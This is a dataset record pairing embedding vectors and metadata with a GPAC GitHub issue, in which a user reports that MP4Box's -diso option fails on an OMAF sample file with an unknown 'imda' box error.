0.013540106825530529, -0.013093408197164536, -0.02359449677169323, -0.003685267176479101, -0.0026985015720129013, -0.0040129683911800385, 0.005327435210347176, 0.00647347467020154, -0.008428698405623436, 0.02331622503697872, -0.018321983516216278, 0.026055002585053444, -0.01909821480512619, 0.025776730850338936, -0.012273238971829414, 0.010845267213881016, 0.007216752506792545, 0.007465732283890247, -0.0010435183066874743, -0.002826652955263853, -0.022276367992162704, -0.02431214414536953, 0.0045109279453754425, -0.005689920391887426, 0.002217018511146307, 0.043439652770757675, -0.0031159089412540197, 0.025352001190185547, 0.0014691638061776757, -0.018644193187355995, -0.004726954735815525, -0.019933030009269714, -0.03169366344809532, -0.004851444624364376, 0.0011606852058321238, -0.010845267213881016, -0.0000168913793459069, 0.0007556353812105954, -0.0007052901783026755, -0.003665128955617547, 0.0294381994754076, 0.002240818226709962, 0.006967772729694843, -0.014697130769491196, -0.0010554180480539799, -0.013313096016645432, 0.003366719465702772, 0.009439263492822647, -0.009900608099997044, 0.007191122509539127, -0.004521912429481745, 0.003093940205872059, -0.0023598158732056618, 0.002735116286203265, -0.018732067197561264, -0.009549107402563095, -0.0033026437740772963, -0.005580076482146978, 0.007776957005262375, -0.003588238265365362, 0.009190283715724945, 0.004756246227771044, -0.03140074759721756, -0.012492927722632885, 0.00020744501671288162, 0.0212950948625803, -0.015758955851197243, 0.015949353575706482, -0.017780086025595665, 0.005202945321798325, -0.016593771055340767, 0.007916092872619629, -0.00486975209787488, -0.002462337026372552, 0.011628820560872555, -0.005019871983677149, -0.018365921452641487, -0.008135780692100525, -0.00897791888564825, -0.017311418429017067, -0.004924674052745104, 0.012243947945535183, -0.0034198106732219458, 0.0005272513371892273, -0.010786683298647404, 0.033919837325811386, -0.0010691485367715359, 0.018292691558599472, 0.011511653661727905, 0.00768175907433033, 0.004686678294092417, -0.0003693505423143506, 0.012888365425169468, -0.000021339490558602847, -0.02971647121012211, 0.013386325910687447, 0.020094133913517, -0.010859913192689419, 0.0009313857881352305, -0.006975095719099045, -0.0042363181710243225, 0.00638926075771451, 0.0020064841955900192, -0.01407468132674694, 0.0005382357048802078, 0.008377437479794025, -0.006250125356018543, -0.01827804557979107, -0.019376486539840698, 0.004642740823328495, -0.024370728060603142, 0.00785018689930439, 0.0012952442048117518, 0.004448683001101017, 0.024180332198739052, -0.004185057245194912, 0.020928949117660522, 0.011064955033361912, -0.0038665097672492266, -0.0001883367367554456, -0.0041118282824754715, -0.017575044184923172, -0.005843702238053083, 0.018556317314505577, -0.0031287239398807287, -0.0015240858774632215, 0.01117479894310236, -0.003881155513226986, 0.003881155513226986, -0.00410450529307127, -0.017824023962020874, -0.009629659354686737, -0.0015341548714786768, -0.016154395416378975, 0.0014362107031047344, 0.011518976651132107, -0.017413940280675888, 0.0035241625737398863, -0.012580802664160728, 0.011797248385846615, 0.007209429517388344, 0.0014233954716473818, -0.02785644493997097, 0.005565430503338575, 0.019552236422896385, -0.0022243415005505085, 0.00615126546472311, -0.01584683172404766, 0.007579237688332796, 0.005334758199751377, 0.0028614369221031666, -0.005089439917355776, -0.020709261298179626, 0.021324386820197105, -0.00969556625932455, 0.0007075786124914885, 0.014609255827963352, 0.012002291157841682, -0.005089439917355776, 0.014169879257678986, -0.003632175736129284, -0.0017144822049885988, 0.01656447909772396, 0.006477136164903641, -0.0035241625737398863, 0.023286933079361916, -0.01181921735405922, -0.0070190331898629665, 0.004770892206579447, 0.01287372037768364, 0.0028467909432947636, 0.030287660658359528, -0.003586407518014312, 0.0071581690572202206, 0.0044852979481220245, -0.0063416617922484875, 0.018922464922070503, -0.0007478547631762922, 0.01751646026968956, 0.011804571375250816, -0.020562801510095596, -0.007945384830236435, -0.0008261186303570867, 0.008494604378938675, -0.005807087756693363, 0.008743584156036377, -0.004756246227771044, 0.015729663893580437, -0.00899988692253828, 0.006026775576174259, -0.015641789883375168, 0.01823410764336586, 0.03389054536819458, -0.02460506185889244, -0.016110457479953766, -0.036790426820516586, 0.015773601830005646, 0.006206187419593334, 0.015466039068996906, 0.01187047827988863, -0.011335903778672218, 0.01646195910871029, 0.004272932652384043, 0.012448989786207676, -0.006400245241820812, -0.018116941675543785, -0.008692324161529541, 0.0006398414843715727, -0.004357146564871073, -0.012968918308615685, 0.010728100314736366, -0.009234221652150154, -0.00582539476454258, -0.00856783427298069, 0.041154894977808, 0.0027003323193639517, 0.004851444624364376, 0.001946069998666644, 0.003947061952203512, -0.018409859389066696, -0.029233157634735107, 0.011994968168437481, 0.0032715213019400835, -0.007425456307828426, 0.012727261520922184, 0.007703727576881647, -0.022437473759055138, 0.004964950028806925, 0.034095585346221924, 0.011042986065149307, -0.005854686722159386, 0.02273039147257805, 0.01342293992638588, 0.0064112297259271145, 0.010588964447379112, 0.008377437479794025, 0.05187567323446274, 0.013239867053925991, -0.0009940884774550796, -0.004466990474611521, -0.01690133474767208, -0.0040971823036670685, -0.014418859034776688, -0.027915028855204582, -0.01294694934040308, -0.011636143550276756, 0.007436440791934729, 0.03131287172436714, 0.0038006033282727003, 0.0015268319984897971, 0.007337580900639296, 0.014806974679231644, 0.0037200511433184147, -0.017867961898446083, -0.00856783427298069, 0.006374615244567394, 0.01045715156942606, 0.025146959349513054, -0.012324499897658825, 0.02239353582262993, -0.006385599263012409, -0.0035937305074185133, -0.010230140760540962, 0.013928222469985485, 0.010874558240175247, -0.011357872746884823, 0.004631756339222193, -0.003939738962799311, 0.005949884653091431, -0.017077084630727768, 0.016857396811246872, -0.009219575673341751, 0.000733208900783211, 0.021368324756622314, -0.0040422603487968445, -0.006865251809358597, -0.012397728860378265, 0.009636982344090939, -0.00809184368699789, 0.0277685709297657, -0.012712615542113781, -0.002868759911507368, -0.013759795576334, 0.007498685736209154, 0.015407455153763294, -0.010662193410098553, -0.005594722460955381, 0.0006210764404386282, -0.00510774739086628, -0.001364812022075057, 0.0006187880062498152, -0.014426182024180889, 0.008582480251789093, -0.010955111123621464, 0.0004366300127003342, 0.010303369723260403, 0.026816587895154953, -0.0005437279469333589, -0.011921738274395466, 0.006250125356018543, 0.013203252106904984, 0.0016751213697716594, 0.0001607613085070625, -0.03632175922393799, 0.013891607522964478, 0.0025740116834640503, -0.014169879257678986, -0.0053860186599195, -0.016110457479953766, -0.004393761046230793, -0.0023122166749089956, -0.0038445410318672657, 0.014250432141125202, 0.007304627913981676, 0.00543361809104681, -0.0315764956176281, 0.026157524436712265, -0.007385179866105318, 0.00029108667513355613, -0.04754049330949783, -0.01306411623954773, 0.0016311837825924158, 0.013181283138692379, 0.019830508157610893, 0.024868687614798546, 0.024048518389463425, 0.009109731763601303, 0.0068249753676354885, 0.004642740823328495, -0.0030536639969795942, 0.03230879083275795, 0.006608949042856693, 0.015524622052907944, 0.0021090053487569094, 0.00367977493442595, 0.0023433391470462084, -0.014645869843661785, 0.015685727819800377, 0.006220833398401737, -0.0201087798923254, -0.0154367471113801, 0.0008000306552276015, 0.0021547735668718815, -0.022847557440400124, -0.016491249203681946, -0.013737826608121395, 0.006484459154307842, -0.005144361872226, -0.0027918689884245396, 0.013217898085713387, -0.013027501292526722, -0.02382883056998253, -0.010676839388906956, 0.009197606705129147, 0.0038189105689525604, -0.020357759669423103, -0.022378889843821526, 0.0059828381054103374, 0.0201087798923254, -0.0023122166749089956, -0.005184638313949108, -0.017589690163731575, -0.020504217594861984, 0.013796409592032433, -0.005499524064362049, 0.016286207363009453, 0.000012157216588093434, 0.007908769883215427, 0.005605706945061684, 0.009007209911942482, -0.007659790106117725, -0.001387696247547865, -0.009160991758108139, -0.021177928894758224, -0.0008659370942041278, 0.009666274301707745, -0.007227736990898848, -0.012053551152348518, 0.003771311603486538, 0.003245891071856022, 0.006759068928658962, 0.008033259771764278, 0.0147190997377038, -0.014008775353431702, 0.01074274629354477, 0.012280561961233616, -0.02488333359360695, -0.0041923802345991135, 0.006078036036342382, 0.0062720938585698605, -0.008479959331452847, -0.0000066221073211636394, 0.006081697531044483, -0.003725543152540922, -0.008370114490389824, -0.0014462796971201897, 0.009754149243235588, -0.017296772450208664, -0.007319273892790079, -0.00040619407081976533, -0.006513750646263361, -0.016022581607103348, 0.011921738274395466, 0.0009922577301040292, -0.016476603224873543, -0.0006778292008675635, 0.008428698405623436, 0.004891720600426197, 0.008333500474691391, 0.01094046514481306, 0.0003922347095794976, -0.012837105430662632, -0.006074374541640282, 0.011086924001574516, -0.008897366002202034, 0.010017774999141693, -0.0034838863648474216, 0.0061768959276378155, 0.01684275083243847, 0.015231705270707607, -0.01971334218978882, 0.013540106825530529, -0.004653725307434797, 0.00064304523402825, 0.004657386802136898, 0.0044413600116968155, -0.0068542673252522945, -0.0002732370048761368, -0.000968458189163357, 0.01728212647140026, -0.025820668786764145, 0.01366459671407938, 0.02781250700354576, 0.005616691429167986, -0.007128877565264702, -0.018409859389066696, 0.013086085207760334, -0.0040422603487968445, -0.005521493032574654, -0.008377437479794025, 0.009834702126681805, -0.004119150806218386, -0.0060524060390889645, 0.026347920298576355, 0.006663870997726917, 0.02230565994977951, -0.0005611199303530157, -0.0012110304087400436, 0.01105763204395771, -0.006641902029514313, 0.02167588844895363, -0.032572414726018906, 0.012544187717139721, -0.0020357759203761816, 0.0023671388626098633, -0.010720777325332165, -0.008933980949223042, 0.0028248222079128027, 0.009959192015230656, 0.01455067191272974, 0.008575157262384892, 0.014323661103844643, -0.0014929634053260088, -0.022671807557344437, -0.008831460028886795, -0.015583205968141556, -0.012676000595092773, 0.020841073244810104, -0.01612510345876217, -0.009014532901346684, 0.00739250285550952, 0.002085205866023898, -0.009241543710231781, -0.005356727167963982, -0.010625578463077545, 0.005883978214114904, 0.021544074639678, 0.009951869025826454, 0.023081891238689423, 0.013613336719572544, 0.00606705155223608, 0.014572640880942345, 0.00047232932411134243, -0.011445747688412666, -0.005169992335140705, 0.04264877364039421, 0.013606013730168343, -0.011555591598153114, -0.005294482223689556, -0.010442505590617657, 0.005411649122834206, -0.010713454335927963, 0.004174073226749897, 0.010515734553337097, -0.0007620429387316108, -0.0065064276568591595, 0.011489685624837875, -0.0048441216349601746, -0.001111255376599729, 0.023081891238689423, -0.00856783427298069, -0.018409859389066696, -0.013349710963666439, 0.0028431296814233065, 0.018849235028028488, -0.030609868466854095, -0.019303256645798683, -0.04092056304216385, 0.03186941519379616, 0.00579244177788496, -0.017311418429017067, 0.005609368439763784, -0.002273771446198225, 0.008882720023393631, -0.01593470759689808, 0.013920899480581284, -0.0040971823036670685, 0.030521994456648827, -0.0093367425724864, 0.0008448836160823703, 0.010706131346523762, 0.047452621161937714, -0.009629659354686737, 0.01761898212134838, -0.004591480363160372, -0.0045109279453754425, -0.010493766516447067, 0.00019520199566613883, 0.0010114804608747363, 0.004997903015464544, -0.030990662053227425, 0.01110889296978712, 0.0006210764404386282, 0.00723872147500515, -0.006667532492429018, 0.007429117802530527, 0.026787295937538147, 0.0032111071050167084, -0.007571915164589882, 0.02312582917511463, -0.027695341035723686, -0.005700904875993729, 0.00045539502752944827, -0.001078302157111466, -0.03904588893055916, -0.005759488325566053, -0.004866090603172779, 0.007637821137905121, 0.012383082881569862, -0.01823410764336586, 0.0030225415248423815, 0.0017895422643050551, -0.029496783390641212, 0.005243221763521433, 0.001240322133526206, 0.009417294524610043, 0.012976241298019886, -0.0011149168713018298, 0.0044413600116968155, -0.00771837355569005, -0.002438537310808897, -0.005085778422653675, 0.011907092295587063, -0.017062438651919365, 0.016623063012957573, -0.0018279877258464694, -0.0053823571652174, 0.0014966249000281096, -0.009519815444946289, -0.02053350955247879, 0.029555365443229675, 0.008003967814147472, 0.001531408866867423, 0.014052712358534336, -0.008802168071269989, 0.004423053003847599, -0.008992563933134079, -0.005279836244881153, 0.0043315161019563675, 0.011826540343463421, -0.021060761064291, -0.004423053003847599, -0.0024513525422662497, 0.01737000234425068, 0.02024059183895588, -0.010794006288051605, 0.025571689009666443, 0.0007945384713821113, 0.015392810106277466, 0.002619780134409666, 0.004280255641788244, 0.02253999374806881, -0.012580802664160728, -0.004071551840752363, 0.02709485962986946, 0.020020904019474983, -0.03131287172436714, -0.011921738274395466, -0.007579237688332796, -0.002004653448238969, 0.004228995181620121, 0.00019577408966142684, 0.006810329854488373, -0.010786683298647404, 0.010259431786835194, 0.02139761671423912, 0.009124376811087132, 0.021939514204859734, -0.0038884785026311874, 0.0047891996800899506, 0.016300853341817856, 0.00973950419574976, 0.00828223954886198, 0.02475152164697647, 0.0001834166469052434, 0.005642321426421404, 0.0005016210488975048, 0.0030078955460339785, -0.02724131941795349, -0.03131287172436714, -0.002456844784319401, -0.015217059291899204, 0.0000010834224895006628, -0.008370114490389824, -0.013627982698380947, 0.004243640694767237, 0.015099892392754555, -0.007304627913981676, -0.0024824750144034624, 0.00028353490051813424, -0.01857096329331398, 0.004302224610000849, 0.0038848170079290867, -0.00868500117212534, -0.017413940280675888, -0.00787215493619442, 0.01371585763990879, -0.010186202824115753, 0.05131912976503372, -0.008472636342048645, 0.01181921735405922, 0.01785331591963768, -0.013635305687785149, -0.005514170043170452, -0.007747665513306856, -0.01213410310447216, -0.005191960837692022, -0.025264127179980278, -0.010266754776239395, 0.017545752227306366, -0.00006573478458449244, -0.00747671676799655, -0.01690133474767208, 0.012214655987918377, 0.012815136462450027, 0.006213510408997536, -0.005609368439763784, -0.010112973861396313, -0.0006759984535165131, 0.01275655347853899, 0.01086723618209362, -0.003161677159368992, 0.007022694684565067, -0.006184218917042017, 0.01040589064359665, 0.005038179457187653, 0.01808764971792698, -0.02110469900071621, 0.021280448883771896, 0.00916831474751234, -0.00820901058614254, 0.004726954735815525, -0.003683436429128051, 0.0193911325186491, -0.020167363807559013, 0.011182121932506561, -0.0017309588147327304, -0.00022449373500421643, -0.000746939389500767, 0.018351275473833084, -0.006608949042856693, -0.027212027460336685, 0.01574430987238884, 0.005019871983677149, -0.0023524928838014603, 0.016681646928191185, 0.008025936782360077, 0.013283804059028625, 0.008296885527670383, 0.016212979331612587, 0.012924980372190475, -0.007864831946790218, -0.004100843798369169, 0.008062551729381084, 0.012221978977322578, -0.00590960867702961, -0.011409132741391659, 0.012485604733228683, -0.01371585763990879, -0.020211301743984222, -0.0031250626780092716, -0.0023909383453428745, -0.02612823247909546, -0.00715450756251812, 0.008802168071269989, 0.025586334988474846, -0.003264198312535882, 0.011482362635433674, -0.011885123327374458, -0.013862316496670246, -0.011255350895226002, 0.0012137765297666192, 0.01641802117228508, -0.0004837714077439159, -0.0144774429500103, -0.011907092295587063, -0.01502666249871254, 0.004038598854094744, -0.0002171707892557606, -0.016535187140107155, 0.01660841703414917, -0.021280448883771896, -0.004477974958717823, -0.0008320685010403395, -0.01880529709160328, 0.008479959331452847, 0.019010338932275772, 0.010779360309243202, 0.027314547449350357, 0.004624433349817991, -0.0014783175429329276, -0.01330577302724123, 0.026391858235001564, -0.004349823575466871, -0.0012851750943809748, 0.0024916287511587143, 0.010662193410098553, 0.009182960726320744, 0.014565317891538143, -0.008443344384431839, -0.010369276627898216, -0.007733019534498453, -0.02268645353615284, 0.009541784413158894, -0.020123425871133804, -0.010691485367715359, 0.00892665795981884, -0.012595448642969131, 0.011013694107532501, 0.0034564253874123096, -0.008304208517074585, 0.008780199103057384, -0.008780199103057384, 0.003652313956990838, -0.014396890066564083, 0.01258812565356493, 0.006788360886275768, 0.005645982921123505, -0.00016968614363577217, 0.0011075939983129501, 0.016212979331612587, -0.012573479674756527, 0.03432992100715637, 0.012866397388279438, 0.01618368737399578, 0.0005716466112062335, 0.018395213410258293, 0.010442505590617657, 0.010325338691473007, -0.0020211301743984222, 0.01536351814866066, 0.005583737976849079, -0.0033209510147571564, 0.006422214210033417, -0.02454647794365883, 0.03178153932094574, -0.0010160572128370404, 0.02770998701453209, 0.018966402858495712, 0.0454607829451561, -0.017121022567152977, -0.0027699002530425787, -0.020079487934708595, 0.024400020018219948, -0.005741181317716837, -0.0189078189432621, -0.001766658155247569, -0.022569285705685616, 0.020665323361754417, 0.0008471720502711833, 0.016857396811246872, 0.014250432141125202, -0.00367977493442595, 0.01040589064359665, 0.013386325910687447, 0.013335064984858036, 0.011936384253203869, 0.006975095719099045, 0.0038445410318672657, 0.0015689388383179903, -0.008868074044585228, 0.009380679577589035, -0.020123425871133804, -0.0006370953633449972, 0.0105303805321455, 0.01057431846857071, -0.002844960195943713, 0.0016824443591758609, 0.019684050232172012, -0.028632676228880882, -0.018365921452641487, -0.000006979672434681561, 0.014850912615656853, -0.00811381172388792, 0.015905415639281273, -0.008538542315363884, 0.006158588454127312, -0.0032440603245049715, -0.0012824289733543992, 0.010566995479166508, -0.01589076966047287, -0.009146345779299736, 0.010083681903779507, 0.0016284376615658402, -0.024810103699564934, -0.0010609101736918092, -0.006048744544386864, -0.0021419585682451725, -0.008765553124248981, 0.0029255126137286425, 0.01871742308139801, -0.005624014418572187, -0.012866397388279438, 0.002841298934072256, 0.0005954461521469057, -0.020928949117660522, 0.03239666670560837, -0.02215920202434063, -0.0013227051822468638, -0.03025836870074272, -0.019112860783934593, 0.013130023144185543 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hi, I tried to extract the box info of a segment using MP4Box with `-diso` option. I got `[iso file] Unknown top-level box type imda ` and `Error opening file <file_name>.mp4: IsoMedia File is truncated`. Windows 64 bits ``` > MP4Box -version MP4Box - GPAC version 2.1-DEV-rev426-g3b6f2436-master ``` the sample video: https://www.mediafire.com/file/ungdop0ywxrenvk/omafv2.0.base.1.mp4/file
Unknown top-level box type imda
https://api.github.com/repos/gpac/gpac/issues/2291/comments
4
2022-10-20T18:51:37
2022-10-27T13:36:26Z
https://github.com/gpac/gpac/issues/2291
1,417,100,376
2,291
false
This is a GitHub Issue repo:gpac owner:gpac Title : Unknown top-level box type imda Issue date: --- start body --- Hi, I tried to extract the box info of a segment using MP4Box with `-diso` option. I got `[iso file] Unknown top-level box type imda ` and `Error opening file <file_name>.mp4: IsoMedia File is truncated`. Windows 64 bits ``` > MP4Box -version MP4Box - GPAC version 2.1-DEV-rev426-g3b6f2436-master ``` the sample video: https://www.mediafire.com/file/ungdop0ywxrenvk/omafv2.0.base.1.mp4/file --- end body ---
543
[ -0.028972569853067398, 0.04240982234477997, -0.016672441735863686, 0.0028528133407235146, 0.0014864658005535603, 0.007943833246827126, -0.021557258442044258, 0.05006537213921547, -0.0044123511761426926, 0.023094775155186653, 0.010978826321661472, -0.005497421137988567, 0.016752520576119423, -0.009201073087751865, -0.013709519058465958, 0.0022061755880713463, -0.029997581616044044, 0.021893590688705444, 0.002476442139595747, -0.014806601218879223, 0.029228823259472847, -0.0028287896420806646, 0.009265136905014515, 0.044748127460479736, -0.0007081983494572341, 0.010474328882992268, -0.02532096952199936, 0.011955790221691132, -0.006846751552075148, 0.011731568723917007, -0.024712368845939636, 0.012308137491345406, 0.011475316248834133, 0.046509865671396255, 0.05419744551181793, 0.020195916295051575, 0.03308862820267677, 0.07956646382808685, -0.007923813536763191, 0.002094065072014928, -0.007895786315202713, -0.04593329504132271, -0.017633387818932533, 0.018994731828570366, -0.027162786573171616, 0.048784106969833374, -0.034081608057022095, -0.00039714164449833333, -0.02958117052912712, -0.0003058015718124807, -0.00181378866545856, -0.017104867845773697, -0.03590741008520126, -0.032127682119607925, -0.011387228965759277, -0.03686835616827011, 0.05432557314634323, 0.024712368845939636, -0.004908840637654066, 0.029132729396224022, 0.008272157050669193, 0.024904558435082436, -0.019234968349337578, 0.03965510427951813, 0.0032031587325036526, 0.0029589177574962378, 0.022646332159638405, 0.017120882868766785, -0.009553421288728714, 0.0202279482036829, -0.01426206436008215, -0.01689666137099266, 0.009024899452924728, 0.0006466376944445074, -0.003975920844823122, -0.05227554962038994, 0.031310874968767166, 0.0025625270791351795, -0.013813622295856476, 0.012884706258773804, -0.0484958216547966, 0.018866604194045067, -0.004476414527744055, 0.009120994247496128, -0.004940872546285391, -0.008003892377018929, -0.04753487557172775, -0.06758664548397064, -0.02607371285557747, -0.00546538969501853, 0.01764940470457077, 0.011339182034134865, 0.025353001430630684, -0.006694601848721504, 0.009873736649751663, 0.009889752604067326, 0.0030770343728363514, 0.008720600046217442, -0.05077006667852402, -0.01607985608279705, -0.00633024238049984, -0.024103770032525063, 0.01846620999276638, -0.024984637275338173, 0.007074976805597544, -0.010178036987781525, 0.03625975549221039, -0.002152122324332595, -0.01193176582455635, 0.12197628617286682, 0.02461627498269081, 0.037412893027067184, 0.016944710165262222, -0.0039498950354754925, 0.02312680520117283, 0.027226848527789116, -0.03792539983987808, -0.03542693704366684, -0.026345981284976006, -0.0068347398191690445, -0.011915750801563263, -0.013140958733856678, -0.049969274550676346, 0.004592529032379389, -0.019939662888646126, 0.04699033871293068, -0.020179899409413338, 0.0035635139793157578, 0.005829748697578907, -0.007779671810567379, -0.04465203359723091, 0.0036916404496878386, 0.017857609316706657, 0.0016115892212837934, -0.009465334005653858, -0.025096748024225235, -0.04276216775178909, 0.02938898093998432, -0.007030933164060116, 0.04484422132372856, -0.013493306003510952, -0.031006576493382454, 0.02588152326643467, -0.00999385491013527, -0.04314654693007469, 0.0026586216408759356, 0.009417287074029446, -0.00021108315559104085, -0.021012721583247185, -0.007151051890105009, -0.016496267169713974, -0.03850196674466133, 0.004696631338447332, 0.023991659283638, 0.035779282450675964, 0.029100697487592697, 0.035394903272390366, -0.005593515932559967, -0.02375142276287079, -0.019299032166600227, 0.005641563329845667, -0.016376148909330368, 0.0012652477016672492, -0.014053858816623688, -0.0287803802639246, -0.025465112179517746, 0.027306927368044853, 0.0014264066703617573, 0.018129877746105194, 0.02042013593018055, 0.029228823259472847, 0.003245200263336301, 0.007038941141217947, 0.011235078796744347, -0.03324878588318825, -0.02291860058903694, 0.03283237665891647, 0.03167923912405968, -0.013749558478593826, -0.019747473299503326, -0.006806712131947279, 0.014878672547638416, 0.012484311126172543, 0.01953926868736744, 0.010946795344352722, -0.003995940554887056, 0.05249977111816406, -0.02368735894560814, 0.03661210462450981, -0.02162132039666176, 0.010186044499278069, 0.012916737236082554, 0.01563141494989395, 0.0038097568321973085, 0.04260201007127762, -0.0012952772667631507, -0.031182749196887016, -0.004784718155860901, -0.02287055365741253, -0.004956888034939766, 0.0025725369341671467, -0.006938842590898275, 0.014574372209608555, -0.0245682280510664, 0.0042962366715073586, -0.017184946686029434, -0.027467086911201477, 0.03071829117834568, 0.004017962142825127, -0.0401996411383152, -0.0023322999477386475, -0.04961692914366722, 0.004772706422954798, 0.003523474559187889, 0.005673594772815704, 0.006334246136248112, -0.05547871068120003, -0.029997581616044044, -0.03148705139756203, -0.012260089628398418, 0.04039183259010315, -0.018866604194045067, 0.01397377997636795, -0.02695458009839058, -0.04228169471025467, -0.02820381335914135, -0.01726502552628517, -0.013397211208939552, -0.025865506380796432, 0.04535672813653946, 0.03606756776571274, 0.04077621176838875, 0.012380208820104599, -0.02078850008547306, 0.015727508813142776, 0.013293108902871609, -0.008087975904345512, -0.007971861399710178, -0.0034473994746804237, 0.001917891320772469, -0.02902061864733696, 0.04484422132372856, -0.008728607557713985, -0.0012512338580563664, 0.0002735197194851935, 0.07514610141515732, 0.025849491357803345, -0.018049798905849457, -0.01833808422088623, 0.011395237408578396, 0.022085778415203094, 0.011731568723917007, 0.002836797386407852, 0.03475427255034447, -0.023671342059969902, 0.029501091688871384, 0.027098722755908966, 0.031871430575847626, -0.0019749475177377462, -0.05503026768565178, 0.0013243058929219842, 0.0060739899054169655, -0.020243963226675987, -0.011427268385887146, 0.02267836406826973, -0.04660595953464508, 0.0038918377831578255, -0.011090937070548534, -0.0006561470218002796, -0.02770732343196869, -0.016280055046081543, -0.018434178084135056, -0.007367264945060015, 0.008552433922886848, -0.001989962300285697, 0.0006826731842011213, 0.02480846457183361, 0.003777725389227271, 0.014133937656879425, 0.001082067028619349, -0.013981787487864494, 0.014117921702563763, 0.01683259941637516, 0.025913553312420845, -0.005261188372969627, -0.0100499102845788, -0.0019469199469313025, 0.019202936440706253, -0.040808241814374924, 0.021781479939818382, 0.0050970264710485935, 0.05086616054177284, -0.051154445856809616, 0.03372926265001297, -0.00898486003279686, -0.0035094607155770063, 0.0002885345311369747, -0.0016886652447283268, 0.019427157938480377, 0.015687469393014908, -0.019186921417713165, 0.00796385295689106, 0.008011900819838047, -0.011074921116232872, -0.01266048476099968, 0.028155764564871788, -0.011195039376616478, 0.02519284375011921, -0.0006055972189642489, -0.028940539807081223, 0.025705348700284958, -0.030750323086977005, -0.03491443023085594, 0.029757345095276833, -0.014662458561360836, 0.0029749337118119, 0.011987821198999882, -0.05118647590279579, -0.016848614439368248, 0.009977838955819607, 0.008440323173999786, 0.010474328882992268, -0.04628564417362213, 0.03616366162896156, 0.004400339443236589, -0.02323891595005989, -0.048463791608810425, -0.010346203111112118, -0.015383169986307621, 0.006698605604469776, -0.0005155083490535617, 0.010234092362225056, 0.04116059094667435, -0.02368735894560814, 0.016944710165262222, -0.03116673417389393, 0.001641618786379695, -0.008840718306601048, -0.014918711967766285, -0.013269085437059402, -0.02575339563190937, 0.026602232828736305, -0.008272157050669193, -0.048848170787096024, -0.009689555503427982, -0.0037857331335544586, -0.00796385295689106, -0.016416188329458237, -0.012348176911473274, 0.030990561470389366, 0.0010139999212697148, -0.008672552183270454, -0.0040039485320448875, 0.019122857600450516, 0.008824702352285385, -0.0013122940436005592, -0.018866604194045067, -0.03302456811070442, 0.030734308063983917, 0.041865285485982895, -0.021941637620329857, -0.021124832332134247, 0.00493286456912756, 0.017168929800391197, -0.00832020491361618, 0.009433302097022533, -0.010858708061277866, -0.010194052942097187, -0.005469393450766802, -0.007151051890105009, -0.011171015910804272, 0.019699426367878914, -0.04359498992562294, 0.04208950698375702, -0.021397100761532784, -0.02280648984014988, 0.03392145037651062, 0.007859750650823116, -0.01997169479727745, 0.025977617129683495, -0.056792002171278, 0.01112296897917986, 0.030253833159804344, -0.03127884492278099, 0.0001540268858661875, -0.006678585894405842, -0.012075908482074738, 0.03155111148953438, -0.035779282450675964, -0.025609254837036133, -0.025977617129683495, 0.04256998002529144, -0.019491219893097878, -0.06739445775747299, -0.007163063623011112, 0.021573273465037346, -0.0496489591896534, -0.008688568137586117, 0.003931877203285694, -0.010666518472135067, 0.03686835616827011, 0.007419316563755274, 0.02222992107272148, 0.010714566335082054, -0.007335233502089977, 0.013221037574112415, 0.018946683034300804, 0.009937799535691738, 0.018562303856015205, -0.0006486396305263042, 0.007947837933897972, -0.021028736606240273, 0.02865225449204445, -0.0006531440885737538, 0.003639589063823223, -0.00967353954911232, 0.0010410265531390905, 0.0028528133407235146, -0.03296050429344177, 0.03635585308074951, -0.0026085723657160997, -0.02781943418085575, -0.01796972006559372, -0.02618582174181938, 0.03706054762005806, 0.02544909529387951, -0.030045628547668457, 0.005060990806668997, 0.037733208388090134, -0.006322234403342009, 0.02551315911114216, -0.01523101981729269, -0.009913776069879532, -0.0199076309800148, 0.010602455586194992, -0.0012522349134087563, -0.027403023093938828, -0.013213030062615871, -0.007291189860552549, 0.03411364182829857, -0.04378718137741089, 0.04596532881259918, 0.010634486563503742, 0.025096748024225235, 0.0076955887489020824, -0.01224407460540533, -0.026794422417879105, -0.030878450721502304, 0.023030711337924004, -0.0012001835275441408, 0.018866604194045067, 0.03731679916381836, 0.020340057089924812, -0.0031230796594172716, -0.017489247024059296, 0.011675513349473476, -0.0015395181253552437, 0.0026225862093269825, 0.03286440670490265, 0.0001740466250339523, -0.004600536543875933, 0.009257128462195396, 0.0281397495418787, 0.004308248404413462, 0.049040358513593674, -0.0006231144652701914, -0.04051995649933815, -0.023511184379458427, 0.014189993031322956, 0.011251094751060009, 0.02938898093998432, -0.019571300595998764, -0.003825772786512971, 0.02198968455195427, 0.005805725231766701, 0.0242479108273983, -0.003497448982670903, 0.012476303614675999, 0.003853800240904093, -0.03443395718932152, 0.010105965659022331, -0.007719612680375576, -0.015295082703232765, 0.03078235499560833, -0.013237053528428078, -0.014894687570631504, -0.008376260288059711, 0.013557368889451027, -0.015046837739646435, 0.012540366500616074, 0.012948769144713879, 0.008047936484217644, -0.011291134171187878, -0.009072947315871716, 0.012212042696774006, -0.019395126029849052, -0.031567130237817764, 0.016496267169713974, -0.005617539398372173, 0.010338194668293, 0.014310111291706562, 0.0035294804256409407, -0.015503288246691227, 0.0061901044100522995, 0.06207721680402756, -0.00376971741206944, -0.0007962852250784636, 0.03830977901816368, -0.0024003670550882816, -0.007583478465676308, -0.030830401927232742, -0.04231372848153114, 0.01483062468469143, -0.03417770192027092, -0.0010960808722302318, -0.02562526986002922, 0.016352124512195587, 0.007883774116635323, 0.03568318858742714, 0.010129989124834538, -0.020115837454795837, -0.004448386840522289, -0.015527311712503433, 0.022261952981352806, -0.002176146022975445, -0.00676667271181941, -0.015567351132631302, -0.010514368303120136, 0.03097454458475113, 0.00012775097275152802, -0.018770510330796242, -0.01973145827651024, 0.01758534088730812, 0.007279178127646446, -0.027787402272224426, 0.012612437829375267, -0.003711660159751773, 0.024327989667654037, 0.009289160370826721, -0.013773582875728607, -0.013557368889451027, 0.024199863895773888, -0.02280648984014988, 0.01977950520813465, -0.020324042066931725, 0.0011771608842536807, 0.0014103908324614167, 0.0012121953768655658, -0.00691081490367651, 0.011467307806015015, 0.01234016939997673, -0.0159517303109169, 0.006946850568056107, 0.019939662888646126, 0.005409334320574999, 0.015239027328789234, 0.016368141397833824, 0.008047936484217644, 0.004244185518473387, 0.038149621337652206, 0.00027752367896027863, 0.016191966831684113, 0.0005004935665056109, -0.0011921756668016315, -0.009120994247496128, -0.0022962645161896944, 0.0002975434181280434, -0.003539490280672908, -0.03453005105257034, -0.001873847795650363, -0.003711660159751773, -0.004716651048511267, 0.008200086653232574, 0.00574966985732317, 0.017889641225337982, 0.005913831759244204, 0.021525226533412933, 